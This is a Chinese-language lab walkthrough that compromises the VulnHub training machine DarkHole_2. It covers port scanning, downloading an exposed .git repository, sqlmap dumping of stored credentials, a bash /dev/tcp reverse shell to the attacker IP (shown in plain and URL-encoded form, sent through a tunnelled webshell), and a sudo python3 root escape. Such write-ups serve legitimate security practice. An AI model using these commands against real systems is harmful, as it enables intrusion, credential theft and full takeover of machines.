DarkHole_2
环境搭建
靶机下载地址
https://vulnhub.com/entry/darkhole-2,740/
kali攻击机ip:192.168.12.144
靶机ip:192.168.12.168
一、信息收集
1.主机发现,发现靶机ip:192.168.12.168
nmap -sn 192.168.12.1/24
2.对主机进行端口扫描,发现开放80和22端口
nmap -sS -sV -O 192.168.12.168 -p-
二、漏洞挖掘
1.访问80端口,一个页面同时发现一个登录页面
2.对网站信息进行收集
whatweb http://192.168.12.168/
3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露
dirsearch -u "http://192.168.12.168/"
4.访问找到源码泄露的位置,并将文件进行下载
http://192.168.12.168/.git/
方法一:wget -r http://192.168.12.168/.git/
方法二:使用工具:githacker
下载地址:
https://gitcode.net/mirrors/WangYihang/GitHacker?utm_source=csdn_github_accelerator
下载:git clone https://gitcode.net/mirrors/WangYihang/GitHacker.git
安装工具:python3 -m pip install -i https://pypi.org/simple/ GitHacker
开始使用: githacker --url http://192.168.12.168/.git/ --output-folder dark
5.查看登录源码
查看git历史日志,发现第二处作者添加了默认凭据
git log
切换过去查看
git checkout a4d900a8d85e8938d3601f3cef113ee293028e10
再次查看login.php,获得默认用户和密码lush@admin.com/321
三、漏洞利用
1.用获得的用户和密码进行登录
2.url处可能存在sql注入
sqlmap -u http://192.168.12.168/dashboard.php?id=1 --cookie=PHPSESSID=ua4s5k56ne8n858b4phmb70jj0 --current-db --tamper=space2comment --level 4 //爆当前数据库,darkhole_2
爆表,ssh表和user表
sqlmap -u http://192.168.12.168/dashboard.php?id=1 --cookie=PHPSESSID=ua4s5k56ne8n858b4phmb70jj0 -D darkhole_2 --tables
爆内容,发现用户和密码:jehad/fool
sqlmap -u http://192.168.12.168/dashboard.php?id=1 --cookie=PHPSESSID=ua4s5k56ne8n858b4phmb70jj0 -D darkhole_2 -T ssh
--dump
四、提权
1.用获得的用户和密码进行ssh登录
2.查看存在suid的文件
find / -user root -perm -4000 -print 2>/dev/null
3.查看定时任务
cat /etc/crontab
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。
4.到查找到的目录下查看,发现webshell文件
cd /opt/web
cat index.php
5.查看历史命令
6.尝试利用webshell—》反弹shell失败
7.webshell利用ssh正向代理
ssh -L 9999:127.0.0.1:9999 jehad@192.168.12.168
8.反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.12.144/8989 0>&1'
url编码:%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%2e%31%34%34%2f%38%39%38%39%20%30%3e%26%31%27
kali开启监听8989端口
靶机执行
curl 'http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%2e%31%34%34%2f%38%39%38%39%20%30%3e%26%31%27'
成功反弹shell
9.查看历史命令。发现密码:gang
10.先ssh进行登录losy/gang,根据获取的命令利用python调sh
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'